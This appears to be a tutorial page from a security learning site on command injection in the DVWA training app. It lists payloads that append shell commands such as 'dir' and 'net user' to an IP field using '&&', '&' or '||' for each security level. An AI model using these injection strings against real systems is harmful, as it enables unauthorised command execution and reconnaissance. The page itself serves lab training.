cybNg.com

DVWA Command-Injection

Previous Next

Execute commands on a Operating system via a website


How to do Command Injection

Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies etc.) to a system shell.

💡 In simple word command injection is performed where the page is executing a command

Security Low

  1. Open the command injection page on dvwa, also available in mutillidae
  2. First, copy paste the given command to understand what it does.
  3. The command on this page is being injected because the ip address given here is output by pinging the address,
  4. And ping is the code of a command so we can inject any workable command here
192.168.43.170 && dir

List of all command injection cmd

Syntax : <Ip Address>< Operator ><CMD>

CMD Name Security Lavel Description
192.168.43.178 && dir Low By using this command, we can see the directory of the website.
192.168.43.178 & dir Medium By using this command, we can see the directory of the website.
192.168.43.178 || dir High By using this command, we can see the directory of the website.
192.168.43.1 && net user Low By using this command, we can see the administrator of the system.
192.168.43.1 & net user Medium By using this command, we can see the administrator of the system.
192.168.43.1 || net user High By using this command, we can see the administrator of the system.

ipconfig,help etc command work just follow the syntax

💡 Tip: Use (&&) for Low Security , (&) for medium security , (||) for high security


Previous Next
cybNg Designed for learning, testing and training. Examples are simplified to improve reading and basic understanding, tutorials and examples are constantly reviewed to avoid over-comprehension and errors, but we cannot warrant the complete accuracy of all content. While using this site, you agree to read and accept our use, cookie and privacy policy. All the information given in it is made for education purpose only, there will be no responsibility of this website or this organization for misuse of the information given in it. We hope that all the information provided in it is good for our students. So that it helps improve the cyber world.